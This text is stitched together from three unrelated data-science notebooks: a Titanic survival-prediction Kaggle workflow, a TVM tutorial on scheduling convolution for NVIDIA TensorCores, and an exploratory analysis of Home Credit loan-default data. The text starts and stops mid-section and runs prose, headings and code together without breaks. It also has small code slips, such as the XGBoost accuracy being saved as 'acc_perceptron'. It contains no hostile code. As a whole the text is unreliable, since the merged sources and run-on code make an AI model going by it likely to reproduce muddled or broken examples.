dataset['Title'].map(title_mapping) dataset['Title'] = dataset['Title'].fillna(0) # Handle missing values train_df.head() # Drop the unnecessary Name column (we have the titles now) train_df = train_df.drop(['Name', 'PassengerId'], axis=1) test_df = test_df.drop(['Name'], axis=1) combine = [train_df, test_df] train_df.shape, test_df.shape # Map Sex to numerical categories for dataset in combine: dataset['Sex'] = dataset['Sex']. \ map( {'female': 1, 'male': 0} ).astype(int) train_df.head() # Guess values of age based on sex (row, male / female) # and socioeconomic class (1st,2nd,3rd) of the passenger guess_ages = np.zeros((2,3),dtype=int) #initialize guess_ages # Fill the NA's for the Age columns # with "qualified guesses" for idx,dataset in enumerate(combine): if idx==0: print('Working on Training Data set\n') else: print('-'*35) print('Working on Test Data set\n') print('Guess values of age based on sex and pclass of the passenger...') for i in range(0, 2): for j in range(0,3): guess_df = dataset[(dataset['Sex'] == i) &(dataset['Pclass'] == j+1)]['Age'].dropna() # Extract the median age for this group # (less sensitive) to outliers age_guess = guess_df.median() # Convert random age float to int guess_ages[i,j] = int(age_guess) print('Guess_Age table:\n',guess_ages) print ('\nAssigning age values to NAN age values in the dataset...') for i in range(0, 2): for j in range(0, 3): dataset.loc[ (dataset.Age.isnull()) & (dataset.Sex == i) & (dataset.Pclass == j+1),\ 'Age'] = guess_ages[i,j] dataset['Age'] = dataset['Age'].astype(int) print() print('Done!') train_df.head() train_df['AgeBand'] = pd.cut(train_df['Age'], 5) train_df[['AgeBand', 'Survived']].groupby(['AgeBand'], as_index=False).mean().sort_values(by='AgeBand', ascending=True) # Plot distributions of Age of passangers who survived or did not survive plot_distribution( train_df , var = 'Age' , target = 'Survived' , row = 'Sex' ) # Change Age column to # map Age ranges (AgeBands) to integer values of categorical type for dataset in combine: dataset.loc[ dataset['Age'] <= 16, 'Age'] = 0 dataset.loc[(dataset['Age'] > 16) & (dataset['Age'] <= 32), 'Age'] = 1 dataset.loc[(dataset['Age'] > 32) & (dataset['Age'] <= 48), 'Age'] = 2 dataset.loc[(dataset['Age'] > 48) & (dataset['Age'] <= 64), 'Age'] = 3 dataset.loc[ dataset['Age'] > 64, 'Age']=4 train_df.head() train_df = train_df.drop(['AgeBand'], axis=1) combine = [train_df, test_df] train_df.head() for dataset in combine: dataset['FamilySize'] = dataset['SibSp'] + dataset['Parch'] + 1 train_df[['FamilySize', 'Survived']].groupby(['FamilySize'], as_index=False).mean().sort_values(by='Survived', ascending=False) sns.countplot(x='Survived', hue="FamilySize", data=train_df, order=[1,0]) for dataset in combine: dataset['IsAlone'] = 0 dataset.loc[dataset['FamilySize'] == 1, 'IsAlone'] = 1 train_df[['IsAlone', 'Survived']].groupby(['IsAlone'], as_index=False).mean() train_df = train_df.drop(['Parch', 'SibSp', 'FamilySize'], axis=1) test_df = test_df.drop(['Parch', 'SibSp', 'FamilySize'], axis=1) combine = [train_df, test_df] train_df.head() # We can also create new geatures based on intuitive combinations for dataset in combine: dataset['Age*Class'] = dataset.Age * dataset.Pclass train_df.loc[:, ['Age*Class', 'Age', 'Pclass']].head(8) # To replace Nan value in 'Embarked', we will use the mode of ports in 'Embaraked' # This will give us the most frequent port the passengers embarked from freq_port = train_df.Embarked.dropna().mode()[0] freq_port # Fill NaN 'Embarked' Values in the datasets for dataset in combine: dataset['Embarked'] = dataset['Embarked'].fillna(freq_port) train_df[['Embarked', 'Survived']].groupby(['Embarked'], as_index=False).mean().sort_values(by='Survived', ascending=False) sns.countplot(x='Survived', hue="Embarked", data=train_df, order=[1,0]); # Map 'Embarked' values to integer values for dataset in combine: dataset['Embarked'] = dataset['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int) train_df.head() # Fill the NA values in the Fares column with the median test_df['Fare'].fillna(test_df['Fare'].dropna().median(), inplace=True) test_df.head() # q cut will find ranges equal to the quartile of the data train_df['FareBand'] = pd.qcut(train_df['Fare'], 4) train_df[['FareBand', 'Survived']].groupby(['FareBand'], as_index=False).mean().sort_values(by='FareBand', ascending=True) for dataset in combine: dataset.loc[ dataset['Fare'] <= 7.91, 'Fare'] = 0 dataset.loc[(dataset['Fare'] > 7.91) & (dataset['Fare'] <= 14.454), 'Fare'] = 1 dataset.loc[(dataset['Fare'] > 14.454) & (dataset['Fare'] <= 31), 'Fare'] = 2 dataset.loc[ dataset['Fare'] > 31, 'Fare'] = 3 dataset['Fare'] = dataset['Fare'].astype(int) train_df = train_df.drop(['FareBand'], axis=1) combine = [train_df, test_df] train_df.head(7) # All features are approximately on the same scale # no need for feature engineering / normalization test_df.head(7) # Check correlation between features # (uncorrelated features are generally more powerful predictors) colormap = plt.cm.viridis plt.figure(figsize=(10,10)) plt.title('Pearson Correlation of Features', y=1.05, size=15) sns.heatmap(train_df.astype(float).corr().round(2)\ ,linewidths=0.1,vmax=1.0, square=True, cmap=colormap, linecolor='white', annot=True)Your Task: Model, Predict, and ChooseTry using different classifiers to model and predict. Choose the best model from:* Logistic Regression* KNN * SVM* Naive Bayes Classifier* Decision Tree* Random Forest* Perceptron* XGBoost.ClassifierX_train = train_df.drop("Survived", axis=1) Y_train = train_df["Survived"] X_test = test_df.drop("PassengerId", axis=1).copy() X_train.shape, Y_train.shape, X_test.shape # Logistic Regression logreg = LogisticRegression() logreg.fit(X_train, Y_train) Y_pred = logreg.predict(X_test) acc_log = round(logreg.score(X_train, Y_train) * 100, 2) acc_log # Support Vector Machines svc = SVC() svc.fit(X_train, Y_train) Y_pred = svc.predict(X_test) acc_svc = round(svc.score(X_train, Y_train) * 100, 2) acc_svc knn = KNeighborsClassifier(n_neighbors = 3) knn.fit(X_train, Y_train) Y_pred = knn.predict(X_test) acc_knn = round(knn.score(X_train, Y_train) * 100, 2) acc_knn # Perceptron perceptron = Perceptron() perceptron.fit(X_train, Y_train) Y_pred = perceptron.predict(X_test) acc_perceptron = round(perceptron.score(X_train, Y_train) * 100, 2) acc_perceptron # XGBoost gradboost = xgb.XGBClassifier(n_estimators=1000) gradboost.fit(X_train, Y_train) Y_pred = gradboost.predict(X_test) acc_perceptron = round(gradboost.score(X_train, Y_train) * 100, 2) acc_perceptron # Random Forest random_forest = RandomForestClassifier(n_estimators=1000) random_forest.fit(X_train, Y_train) Y_pred = random_forest.predict(X_test) random_forest.score(X_train, Y_train) acc_random_forest = round(random_forest.score(X_train, Y_train) * 100, 2) acc_random_forest # Look at importnace of features for random forest def plot_model_var_imp( model , X , y ): imp = pd.DataFrame( model.feature_importances_ , columns = [ 'Importance' ] , index = X.columns ) imp = imp.sort_values( [ 'Importance' ] , ascending = True ) imp[ : 10 ].plot( kind = 'barh' ) print (model.score( X , y )) plot_model_var_imp(random_forest, X_train, Y_train) # How to create a Kaggle submission: submission = pd.DataFrame({ "PassengerId": test_df["PassengerId"], "Survived": Y_pred }) submission.to_csv('titanic.csv', index=False)How to optimize convolution using TensorCores=============================================**Author**: ` `_In this tutorial, we will demonstrate how to write a high performance convolutionschedule using TensorCores in TVM. In this example, we assume the input toconvolution has a large batch. We strongly recommend covering the `opt-conv-gpu` tutorial first. TensorCore Introduction-----------------------Each Tensor Core provides a 4x4x4 matrix processing array that operates:code:`D = A * B + C`, where A, B, C and D are 4x4 matrices as Figure shows.The matrix multiplication inputs A and B are FP16 matrices, while the accumulationmatrices C and D may be FP16 or FP32 matrices.However, CUDA programmers can only use warp-level primitive:code:`wmma::mma_sync(acc_frag, a_frag, b_frag, acc_frag)` to perform16x16x16 half-precision matrix multiplication on tensor cores. Before invokingthe matrix multiplication, programmers must load data from memory into registerswith primitive :code:`wmma::load_matrix_sync`, explicitly. The NVCC compiler translatesthat primitive into multiple memory load instructions. At run time, every thread loads16 elements from matrix A and 16 elements from B. Preparation and Algorithm-------------------------We use the fixed size for input tensors with 256 channels and 14 x 14 dimensions.The batch size is 256. Convolution filters contain 512 filters of size 3 x 3.We use stride size 1 and padding size 1 for the convolution. In the example, we useNHWCnc memory layout.The following code defines the convolution algorithm in TVM.import tvm from tvm import te import numpy as np from tvm.contrib import nvcc # The sizes of inputs and filters batch_size = 256 height = 14 width = 14 in_channels = 256 out_channels = 512 kernel_h = 3 kernel_w = 3 pad_h = 1 pad_w = 1 stride_h = 1 stride_w = 1 # TensorCore shape block_size = 16 assert batch_size % block_size == 0 assert in_channels % block_size == 0 assert out_channels % block_size == 0 # Input feature map: (N, H, W, IC, n, ic) data_shape = ( batch_size // block_size, height, width, in_channels // block_size, block_size, block_size, ) # Kernel: (H, W, IC, OC, ic, oc) kernel_shape = ( kernel_h, kernel_w, in_channels // block_size, out_channels // block_size, block_size, block_size, ) # Output feature map: (N, H, W, OC, n, oc) output_shape = ( batch_size // block_size, height, width, out_channels // block_size, block_size, block_size, ) # Reduction axes kh = te.reduce_axis((0, kernel_h), name="kh") kw = te.reduce_axis((0, kernel_w), name="kw") ic = te.reduce_axis((0, in_channels // block_size), name="ic") ii = te.reduce_axis((0, block_size), name="ii") # Algorithm A = te.placeholder(data_shape, name="A", dtype="float16") W = te.placeholder(kernel_shape, name="W", dtype="float16") Apad = te.compute( ( batch_size // block_size, height + 2 * pad_h, width + 2 * pad_w, in_channels // block_size, block_size, block_size, ), lambda n, h, w, i, nn, ii: tvm.tir.if_then_else( tvm.tir.all(h >= pad_h, h - pad_h < height, w >= pad_w, w - pad_w < width), A[n, h - pad_h, w - pad_w, i, nn, ii], tvm.tir.const(0.0, "float16"), ), name="Apad", ) Conv = te.compute( output_shape, lambda n, h, w, o, nn, oo: te.sum( Apad[n, h * stride_h + kh, w * stride_w + kw, ic, nn, ii].astype("float32") * W[kh, kw, ic, o, ii, oo].astype("float32"), axis=[ic, kh, kw, ii], ), name="Conv", ) s = te.create_schedule(Conv.op) s[Apad].compute_inline()Memory Scope------------In traditional GPU schedule, we have global, shared and local memory scope.To support TensorCores, we add another three special memory scope: :code:`wmma.matrix_a`,:code:`wmma.matrix_b` and :code:`wmma.accumulator`. On hardware, all fragments scopestores at the on-chip registers level, the same place with local memory.# Designate the memory hierarchy AS = s.cache_read(Apad, "shared", [Conv]) WS = s.cache_read(W, "shared", [Conv]) AF = s.cache_read(AS, "wmma.matrix_a", [Conv]) WF = s.cache_read(WS, "wmma.matrix_b", [Conv]) ConvF = s.cache_write(Conv, "wmma.accumulator")Define Tensor Intrinsic-----------------------In fact, TensorCore is a special hardware operation. So, we can just use tensorizeto replace a unit of computation with the TensorCore instruction. The first thing isthat we need to define tensor intrinsic.There are four basic operation in TensorCore: :code:`fill_fragment`, :code:`load_matrix`,:code:`mma_sync` and :code:`store_matrix`. Since :code:`fill_fragment` and :code:`mma_sync`are both used in matrix multiplication, so we can just write following three intrinsics.def intrin_wmma_load_matrix(scope): n = 16 A = te.placeholder((n, n), name="A", dtype="float16") BA = tvm.tir.decl_buffer(A.shape, A.dtype, scope="shared", data_alignment=32, offset_factor=256) C = te.compute((n, n), lambda i, j: A[i, j], name="C") BC = tvm.tir.decl_buffer(C.shape, C.dtype, scope=scope, data_alignment=32, offset_factor=256) def intrin_func(ins, outs): ib = tvm.tir.ir_builder.create() BA = ins[0] BC = outs[0] ib.emit( tvm.tir.call_intrin( "handle", "tir.tvm_load_matrix_sync", BC.data, n, n, n, BC.elem_offset // 256, BA.access_ptr("r"), n, "row_major", ) ) return ib.get() return te.decl_tensor_intrin(C.op, intrin_func, binds={A: BA, C: BC}) def intrin_wmma_gemm(): n = 16 A = te.placeholder((n, n), name="A", dtype="float16") B = te.placeholder((n, n), name="B", dtype="float16") k = te.reduce_axis((0, n), name="k") C = te.compute( (n, n), lambda ii, jj: te.sum(A[ii, k].astype("float") * B[k, jj].astype("float"), axis=k), name="C", ) BA = tvm.tir.decl_buffer( A.shape, A.dtype, name="BA", scope="wmma.matrix_a", data_alignment=32, offset_factor=256 ) BB = tvm.tir.decl_buffer( B.shape, B.dtype, name="BB", scope="wmma.matrix_b", data_alignment=32, offset_factor=256 ) BC = tvm.tir.decl_buffer( C.shape, C.dtype, name="BC", scope="wmma.accumulator", data_alignment=32, offset_factor=256 ) def intrin_func(ins, outs): BA, BB = ins (BC,) = outs def init(): ib = tvm.tir.ir_builder.create() ib.emit( tvm.tir.call_intrin( "handle", "tir.tvm_fill_fragment", BC.data, n, n, n, BC.elem_offset // 256, 0.0 ) ) return ib.get() def update(): ib = tvm.tir.ir_builder.create() ib.emit( tvm.tir.call_intrin( "handle", "tir.tvm_mma_sync", BC.data, BC.elem_offset // 256, BA.data, BA.elem_offset // 256, BB.data, BB.elem_offset // 256, BC.data, BC.elem_offset // 256, ) ) return ib.get() return update(), init(), update() return te.decl_tensor_intrin(C.op, intrin_func, binds={A: BA, B: BB, C: BC}) def intrin_wmma_store_matrix(): n = 16 A = te.placeholder((n, n), name="A", dtype="float32") BA = tvm.tir.decl_buffer( A.shape, A.dtype, scope="wmma.accumulator", data_alignment=32, offset_factor=256 ) C = te.compute((n, n), lambda i, j: A[i, j], name="C") BC = tvm.tir.decl_buffer(C.shape, C.dtype, scope="global", data_alignment=32, offset_factor=256) def intrin_func(ins, outs): ib = tvm.tir.ir_builder.create() BA = ins[0] BC = outs[0] ib.emit( tvm.tir.call_intrin( "handle", "tir.tvm_store_matrix_sync", BA.data, n, n, n, BA.elem_offset // 256, BC.access_ptr("w"), n, "row_major", ) ) return ib.get() return te.decl_tensor_intrin(C.op, intrin_func, binds={A: BA, C: BC})Scheduling the Computation--------------------------To use TensorCores in TVM, we must schedule the computation into specific structureto match the tensor intrinsic. The same as traditional GPU programs, we can also useshared memory to boost the speed. If you have any questions about blocking and sharedmemory, please refer `opt-conv-gpu`.In this example, each block contains 2x4 warps, and each warp calls 4x2 TensorCoreinstructions. Thus, the output shape of each warp is 64x32 and each block outputs128x128 titles. Due to the limit of shared memory space, we only load 2 blocks (2x128x128 tiles)one time.Note*Warp-level Operation* Note that all TensorCore instructions are warp-level instructions, which means all 32 threads in a warp should do this instruction simultaneously. Making theadIdx.x extent=32 is one of the easiest way to solve this. Then We can bind threadIdx.x to any loops except those contain TensorCore intrinsics directly or indirectly. Also note that it is not the unique solution. The only thing we should do is to make sure all threads in a warp can call TensorCore at the same time.# Define tiling sizes block_row_warps = 4 block_col_warps = 2 warp_row_tiles = 2 warp_col_tiles = 4 warp_size = 32 chunk = 2 block_x = te.thread_axis("blockIdx.x") block_y = te.thread_axis("blockIdx.y") block_z = te.thread_axis("blockIdx.z") thread_x = te.thread_axis("threadIdx.x") thread_y = te.thread_axis("threadIdx.y") thread_z = te.thread_axis("threadIdx.z") nc, hc, wc, oc, nnc, ooc = Conv.op.axis block_k = s[Conv].fuse(hc, wc) s[Conv].bind(block_k, block_z) nc, nci = s[Conv].split(nc, factor=warp_row_tiles) block_i, nc = s[Conv].split(nc, factor=block_row_warps) oc, oci = s[Conv].split(oc, factor=warp_col_tiles) block_j, oc = s[Conv].split(oc, factor=block_col_warps) s[Conv].reorder(block_k, block_i, block_j, nc, oc, nci, oci, nnc, ooc) s[Conv].bind(block_i, block_x) s[Conv].bind(block_j, block_y) s[Conv].bind(nc, thread_y) s[Conv].bind(oc, thread_z) # Schedule local computation s[ConvF].compute_at(s[Conv], oc) n, h, w, o, nnf, oof = ConvF.op.axis ko, ki = s[ConvF].split(ic, factor=chunk) s[ConvF].reorder(ko, kh, ki, kw, n, o, nnf, oof, ii) # Move intermediate computation into each output compute tile s[AF].compute_at(s[ConvF], kw) s[WF].compute_at(s[ConvF], kw) # Schedule for A's share memory s[AS].compute_at(s[ConvF], kh) n, h, w, i, nn, ii = AS.op.axis tx, xo = s[AS].split(n, nparts=block_row_warps) ty, yo = s[AS].split(xo, nparts=block_col_warps) t = s[AS].fuse(nn, ii) to, ti = s[AS].split(t, factor=warp_size) s[AS].bind(tx, thread_y) s[AS].bind(ty, thread_z) s[AS].bind(ti, thread_x) # Schedule for W's share memory s[WS].compute_at(s[ConvF], kh) kh, kw, ic, o, ii, oo = WS.op.axis tx, xo = s[WS].split(o, nparts=block_row_warps) ty, yo = s[WS].split(xo, nparts=block_col_warps) t = s[WS].fuse(ii, oo) to, ti = s[WS].split(t, nparts=warp_size) s[WS].bind(tx, thread_y) s[WS].bind(ty, thread_z) s[WS].bind(to, thread_x) s[WS].vectorize(ti) print(tvm.lower(s, [A, W, Conv], simple_mode=True))Lowering Computation to Intrinsics----------------------------------The last phase is to lower the computation loops down to TensorCore hardware intrinsicsby mapping the 2D convolution to tensor intrinsicss[AF].tensorize(AF.op.axis[-2], intrin_wmma_load_matrix("wmma.matrix_a")) s[WF].tensorize(WF.op.axis[-2], intrin_wmma_load_matrix("wmma.matrix_b")) s[Conv].tensorize(nnc, intrin_wmma_store_matrix()) s[ConvF].tensorize(nnf, intrin_wmma_gemm()) print(tvm.lower(s, [A, W, Conv], simple_mode=True))Generate CUDA Kernel--------------------Finally we use TVM to generate and compile the CUDA kernel, and evaluate the latency of convolution.Since TensorCores are only supported in NVIDIA GPU with Compute Capability 7.0 or higher, it may notbe able to run on our build serverdev = tvm.cuda(0) if nvcc.have_tensorcore(dev.compute_version): with tvm.transform.PassContext(config={"tir.UnrollLoop": {"auto_max_step": 16}}): func = tvm.build(s, [A, W, Conv], "cuda") a_np = np.random.uniform(size=data_shape).astype(A.dtype) w_np = np.random.uniform(size=kernel_shape).astype(W.dtype) a = tvm.nd.array(a_np, dev) w = tvm.nd.array(w_np, dev) c = tvm.nd.array(np.zeros(output_shape, dtype=Conv.dtype), dev) evaluator = func.time_evaluator(func.entry_name, dev, number=10) print("conv2d with tensor core: %f ms" % (evaluator(a, w, c).mean * 1e3))Contents- 1. Read dataset - 1.1. Read dataset - 1.2. Check null data - 1.3. Make meta dataframe- 2. EDA - application train - 2.1. Object feature - 2.1.1 Contract type - 2.1.2. Gender - 2.1.3. Do you have an own car? - 2.1.4. Do you have own realty? - 2.1.5. Suite type - 2.1.6. Income type - 2.1.7 Contract type - 2.1.8. 2.8 Family status - 2.1.9. Housing type - 2.1.10. Occupation type - 2.1.11. Process start (weekday) - 2.1.12. Organization type - 2.1.13. FONDKAPREMONT - 2.1.14. House type - 2.1.15. Wall material - 2.1.16. Emergency - 2.2. Int feature - 2.2.1 Count of children - 2.2.2. Mobil - 2.2.3. EMP Phone - 2.2.4. Work phone - 2.2.5. Cont mobile - 2.2.6. Phone - 2.2.7 Region Rating Client - 2.2.8. Region Rating Client With City - 2.2.9. Hour Appr Process Start - 2.2.10. Register region and not live region - 2.2.11. Register region and not work region - 2.2.12. Live region and not work region - 2.2.13. Register city and not live city - 2.2.14. Register city and not work city - 2.2.15. Live city and not work city - 2.2.16. Heatmap for int features - 2.2.17. More analysis for int features which have correlation with target - 2.2.18. linear regression analysis on the high correlated feature combinations - 3. EDA - Bureau - 3.1. Read and check data - 3.2. Merge with application_train - 3.3. Analysis on object feature - 3.3.1. Credit active - 3.3.2. Credit currency - 3.3.3. Credit type - 3.4. Analysis on int feature - 3.4.1. Credit day - 3.4.2. Credit day overdue - 3.4.3. Credit day prolong - 3.5. Analysis on float feature - 3.5.1 Amount credit sum - 3.5.2 Amount credit sum debt - 3.5.3 Amount credit sum limit - 3.5.4 Amount credit sum overdue 1. Read dataset 1.1. Read datasetapplication_train = pd.read_csv('../input/application_train.csv') # POS_CASH_balance = pd.read_csv('../input/POS_CASH_balance.csv') bureau_balance = pd.read_csv('../input/bureau_balance.csv') previous_application = pd.read_csv('../input/previous_application.csv') # installments_payments = pd.read_csv('../input/installments_payments.csv') # credit_card_balance = pd.read_csv('../input/credit_card_balance.csv') # bureau = pd.read_csv('../input/bureau.csv') # application_test = pd.read_csv('../input/application_test.csv') print('Size of application_tra data', application_train.shape) # print('Size of POS_CASH_balance data', POS_CASH_balance.shape) # print('Size of bureau_balance data', bureau_balance.shape) # print('Size of previous_application data', previous_application.shape) # print('Size of installments payments data', installments_payments.shape) # print('Size of credit_card_balance data', credit_card_balance.shape) # print('Size of bureau data', bureau.shape) application_train.head()1.2. Check null data - With msno library, we could see the blanks in the dataset. Check null data in application train.msno.matrix(df=application_train, figsize=(10, 8), color=(0, 0.6, 1)) # checking missing data total = application_train.isnull().sum().sort_values(ascending = False) percent = (application_train.isnull().sum()/application_train.isnull().count()*100).sort_values(ascending = False) missing_application_train_data = pd.concat([total, percent], axis=1, keys=['Total', 'Percent']) missing_application_train_data.head(20)1.3. Make meta dataframeapplication_train.info()- There are 3 data types(float64, int64, object) in application_train dataframe. - Before starting EDA, It would be useful to make meta dataframe which include the information of dtype, level, response rate and role of each features.def make_meta_dataframe(df): data = [] for col in df.columns: if col == 'TARGET': role = 'target' elif col == 'SK_ID_CURR': role = 'id' else: role = 'input' if df[col].dtype == 'float64': level = 'interval' elif df[col].dtype == 'int64': level = 'ordinal' elif df[col].dtype == 'object': level = 'categorical' col_dict = { 'varname': col, 'role': role, 'level': level, 'dtype': df[col].dtype, 'response_rate': 100 * df[col].notnull().sum() / df.shape[0] } data.append(col_dict) meta = pd.DataFrame(data, columns=['varname', 'role', 'level', 'dtype', 'response_rate']) meta.set_index('varname', inplace=True) return meta meta = make_meta_dataframe(application_train)1.4. Check imbalance of target - Checking the imbalance of dataset is important. If imbalanced, we need to select more technical strategy to make a model.def random_color_generator(number_of_colors): color = ["#"+''.join([random.choice('0123456789ABCDEF') for j in range(6)]) for i in range(number_of_colors)] return color cnt_srs = application_train['TARGET'].value_counts() text = ['{:.2f}%'.format(100 * (value / cnt_srs.sum())) for value in cnt_srs.values] trace = go.Bar( x = cnt_srs.index, y = (cnt_srs / cnt_srs.sum()) * 100, marker = dict( color = random_color_generator(2), line = dict(color='rgb(8, 48, 107)', width = 1.5 ) ), opacity = 0.7 ) data = [trace] layout = go.Layout( title = 'Target distribution(%)', margin = dict( l = 100 ), xaxis = dict( title = 'Labels (0: repay, 1: not repay)' ), yaxis = dict( title = 'Account(%)' ), width=800, height=500 ) annotations = [] for i in range(2): annotations.append(dict( x = cnt_srs.index[i], y = ((cnt_srs / cnt_srs.sum()) * 100)[i], text = text[i], font = dict( family = 'Arial', size = 14, ), showarrow = True )) layout['annotations'] = annotations fig = go.Figure(data=data, layout=layout) py.iplot(fig)- As you can see, target is imbalanced.- This fact makes this competition diffcult to solve. But, no pain, no gain. After this competition, we could learn many things! Enjoy! 2. EDA - application_train 2.1. Object feature - I want to draw two count bar plot for each object and int features. One contain the each count of responses and other contain the percent on target.def get_percent(df, temp_col, width=800, height=500): cnt_srs = df[[temp_col, 'TARGET']].groupby([temp_col], as_index=False).mean().sort_values(by=temp_col) trace = go.Bar( x = cnt_srs[temp_col].values[::-1], y = cnt_srs['TARGET'].values[::-1], text = cnt_srs.values[::-1], textposition = 'auto', textfont = dict( size=12, color='rgb(0, 0, 0)' ), orientation = 'v', marker = dict( color = random_color_generator(100), line=dict(color='rgb(8,48,107)', width=1.5,) ), opacity = 0.7, ) return trace # fig = go.Figure(data=data, layout=layout) # py.iplot(fig) def get_count(df, temp_col, width=800, height=500): cnt_srs = df[temp_col].value_counts().sort_index() trace = go.Bar( x = cnt_srs.index[::-1], y = cnt_srs.values[::-1], text = cnt_srs.values[::-1], textposition = 'auto', textfont = dict( size=12, color='rgb(0, 0, 0)' ), name = 'Percent', orientation = 'v', marker = dict( color = random_color_generator(100), line=dict(color='rgb(8,48,107)', width=1.5,) ), opacity = 0.7, ) return trace # fig = go.Figure(data=data, layout=layout) # py.iplot(fig) def plot_count_percent_for_object(df, temp_col, height=500): trace1 = get_count(df, temp_col) trace2 = get_percent(df, temp_col) fig = tools.make_subplots(rows=1, cols=2, subplot_titles=('Count', 'Percent'), print_grid=False) fig.append_trace(trace1, 1, 1) fig.append_trace(trace2, 1, 2) fig['layout']['yaxis1'].update(title='Count') fig['layout']['yaxis2'].update(range=[0, 1], title='% TARGET') fig['layout'].update(title='{} (Response rate: {:.2f}%)'.format(temp_col, meta[(meta.index == temp_col)]['response_rate'].values[0]), margin=dict(l=100), width=800, height=height, showlegend=False) py.iplot(fig) features_dtype_object = meta[meta['dtype'] == 'object'].index features_dtype_int = meta[meta['dtype'] == 'int64'].index features_dtype_float = meta[meta['dtype'] == 'float64'].index- Sometimes, null data itself can be important feature. So, I want to compare the change when using null data as feature and not using nulll data as feature.application_object_na_filled = application_train[features_dtype_object].fillna('null') application_object_na_filled['TARGET'] = application_train['TARGET']2.1.1. Contract type **REMIND: repay == 0 and not repay == 1**temp_col = features_dtype_object[0] plot_count_percent_for_object(application_train, temp_col)- Most contract type of clients is Cash loans. - Not repayment rate is higher in cash loans (~8%) than in revolving loans(~5%). 2.1.2. Gendertemp_col = features_dtype_object[1] plot_count_percent_for_object(application_train, temp_col)- The number of female clients is almoist double the number of male clients.- Males have a higher chance of not returning their loans (~10%), comparing with women(~7%). 2.1.3. Do you have an own car?temp_col = features_dtype_object[2] plot_count_percent_for_object(application_train, temp_col)- The clients that owns a car are higher than no-car clients by a factor of two times. - The Not-repayment percent is similar. (Own: ~7%, Not-own: ~8%) 2.1.4. Do you have own realty?temp_col = features_dtype_object[3] plot_count_percent_for_object(application_train, temp_col)- T he clients that owns a realty almost a half of the ones that doesn't own realty. - Both categories have not-repayment rate, about ~8%. 2.1.5. Suite typetemp_col = features_dtype_object[4] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- Most suite type of clients are 'Unaccompanied', followed by Family, Spouse, children.- When considering null data, there is no change the order.- Other_B and Other_A have higher not-repayment rate than others. 2.1.6. Income typetemp_col = features_dtype_object[5] plot_count_percent_for_object(application_train, temp_col)- Most of the clients get income from working. - The number of Student, Unemployed, Bussnessman and Maternity leave are very few.- When unemployed and maternity leave, there is high probability of not-repayment. 2.1.7. Education typetemp_col = features_dtype_object[6] plot_count_percent_for_object(application_train, temp_col)- Clients with secondary education type are most numerous, followed by higher education, incomplete higher.- Clients with Lower secondary have the highest not-repayment rate(~10%). 2.1.8. Family statustemp_col = features_dtype_object[7] plot_count_percent_for_object(application_train, temp_col)- Most of clients for loans are married followed by single/not married, civial marriage.- Civil marriage have almost 10% ratio of not returning loans followed by single/notmarried(9.9%), separate(8%). 2.1.9. Housing typetemp_col = features_dtype_object[8] plot_count_percent_for_object(application_train, temp_col)- Clients with house/apartment are most numerous, followed by With parents, Municipal apartment.- When Rented apartment and live with parents, clients have somewhat high not-repayment ratio. (~12%) 2.1.10. Occupation typetemp_col = features_dtype_object[9] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- When not considering null data, Majority of clients are laborers, sales staff, core staff, drivers. But with considering null data, null data(I think it would be 'not want to repond' or 'no job', 'not in category') are most numerous.- However, not-repayment rate is low for null data. Low-skill labor is the most high not-repayment rate (~17%) in both plot. 2.1.11. Process start (weekday)temp_col = features_dtype_object[10] plot_count_percent_for_object(application_train, temp_col)- The number of process for weekend is less than other days. That's because Weekend is weekend.- There are no big changes between not-repayment rate of all days.- Day is not important factor for repayment. 2.1.12. Organization typetemp_col = features_dtype_object[11] plot_count_percent_for_object(application_train, temp_col)- The most frequent case of organization is Bussiness Entity Type 3 followed XNA and self-employ.- The Transport: type 3 has the highest not repayment rate(~16%), Industry: type 13(~13.5%). 2.1.13. FONDKAPREMONTtemp_col = features_dtype_object[12] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- Actually, I don't know exact meaning of this feature FONDKAPREMONT_MODE.- Anyway, when considering null data, nul data has the highest count and not-repayment rate. 2.1.14. House typetemp_col = features_dtype_object[13] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- When considering null data, null data and block of flats are two-top. - But, specific housing and terraced house have higher not-repayment rate than block of flats. - null data has the highest not-repayment rate(~9%). 2.1.15. Wall materialtemp_col = features_dtype_object[14] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- There are over 150,000 null data for WALLSMATERIAL_MODE. - Clients with Wooden have higher than 9% not repayment rate. 2.1.16. Emergencytemp_col = features_dtype_object[15] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- For emergency state, there is also many null data. - If clients is in an emergency state, not-repayment rate(~10%) is higher than not in an emergency state.- null is also high not-repayment rate(~-10%). 2.2. Int feature - Let's do similar analysis for int features.def plot_count_percent_for_int(df, temp_col, height=500): trace1 = get_count(df, temp_col) trace2 = get_percent(df, temp_col) fig = tools.make_subplots(rows=1, cols=2, subplot_titles=('Count', 'Percent'), print_grid=False) fig.append_trace(trace1, 1, 1) fig.append_trace(trace2, 1, 2) fig['layout']['xaxis1'].update(tickvals=[i for i in range(20)]) fig['layout']['xaxis2'].update(tickvals=[i for i in range(20)]) fig['layout']['yaxis1'].update(title='Count') fig['layout']['yaxis2'].update(range=[0, 1], title='% TARGET') fig['layout'].update(title='{} (Response rate: {:.2f}%)'.format(temp_col, meta[(meta.index == temp_col)]['response_rate'].values[0]), margin=dict(l=100), width=800, height=height, showlegend=False) py.iplot(fig) application_train_int = application_train[meta[meta['dtype'] == 'int64'].index] application_train_int['TARGET'] = application_train['TARGET']2.2.1. Count of childrenfeatures_dtype_int temp_col = features_dtype_int[2] plot_count_percent_for_int(application_train_int, temp_col)- Most clients with no children requested loan. - Clients with 9, 11 have 100% not-repayment rate. the each count of those cases is 2 and 1.- Except 9, 11, Clients with 6 children has high not-repayment rate. 2.2.2. Mobiltemp_col = features_dtype_int[6] plot_count_percent_for_int(application_train_int, temp_col)- There are no clients without mobil(maybe mobile). 2.2.3. EMP Phonetemp_col = features_dtype_int[7] plot_count_percent_for_int(application_train, temp_col)- Most clients(82%) have EPM Phone.- The gap between the not-repayment percent is about 3%. 2.2.3. Work Phonetemp_col = features_dtype_int[8] plot_count_percent_for_int(application_train, temp_col)- Most clients(80%) don't have work phone. 2.2.5. Cont mobiletemp_col = features_dtype_int[9] 